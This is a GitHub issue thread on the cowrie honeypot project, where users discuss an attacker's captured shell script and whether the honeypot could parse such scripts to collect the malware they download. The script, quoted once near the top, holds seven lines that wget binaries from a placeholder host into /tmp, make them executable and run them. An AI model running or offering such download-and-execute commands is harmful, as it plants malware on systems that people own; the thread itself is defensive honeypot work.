### ISSUE TITLE
Shell scripts as payload spotted

### ISSUE THREAD

**Issue by ToeiRei** [cowrie/cowrie#1]
Hi there,

found something in my downloads which reads as followed:

```bash
rm -rf /tmp/aa && wget http://somehost/Rekt/aa -P /tmp && chmod +x /tmp/aa && /tmp/aa 
rm -rf /tmp/bb && wget http://somehost/Rekt/bb -P /tmp && chmod +x /tmp/bb && /tmp/bb 
rm -rf /tmp/cc && wget http://somehost/Rekt/cc -P /tmp && chmod +x /tmp/cc && /tmp/cc 
rm -rf /tmp/dd && wget http://somehost/Rekt/dd -P /tmp && chmod +x /tmp/dd && /tmp/dd 
rm -rf /tmp/ee && wget http://somehost/Rekt/ee -P /tmp && chmod +x /tmp/ee && /tmp/ee 
rm -rf /tmp/ff && wget http://somehost/Rekt/ff -P /tmp && chmod +x /tmp/ff && /tmp/ff 
rm -rf /tmp/gg && wget http://somehost/Rekt/gg -P /tmp && chmod +x /tmp/gg && /tmp/gg
```

that way the honeypot was successfully avoided.

In theory we need to find out if it's a shell script (file magic should help here) and run its contents through the tty emulation again?

cheers

**Comment by micheloosterhof** [comment]
Hi! I don't completely understand your question. I see this kind of behavior quite often, usually it's automated scripts, I don't think there's any type of detection in there.

**Comment by ToeiRei** [comment]
Well... those shell scripts are more or less a way to avoid us. If we could parse them we could fetch the malware they're trying to plant that way.

**Comment by micheloosterhof** [comment]
True. I guess technically you could build something that takes shell scripts and runs them through the command interpreter... Or if you want the samples, you could open up the script yourself and take a look.. sometimes it's binary, sometimes more wget commands...

**Comment by ToeiRei** [comment]
If we could interpret shell scripts - at least some basics, we'd be harder to detect.

**Comment by micheloosterhof** [comment]
But we'll always be detected at some point. The idea is to string them along as long as possible so they expose their tools. If you want full machine honeypots, check out honssh

**Comment by ToeiRei** [comment]
true about the detection; But I'd think of getting as much stuff from them as possible to submit it to the malware labs for analysis.

**Comment by katkad** [comment]
@ToeiRei hi, this could be interesting for you https://github.com/CZ-NIC/honssh/commit/cc0d85e9049873b1a7ed9eb1fa8a1e0be62c7613

I have early WIP for kippo too, but not in git yet

**Comment by ToeiRei** [comment]
I'll see if I'll set up a pot again in the near future. I lack time.
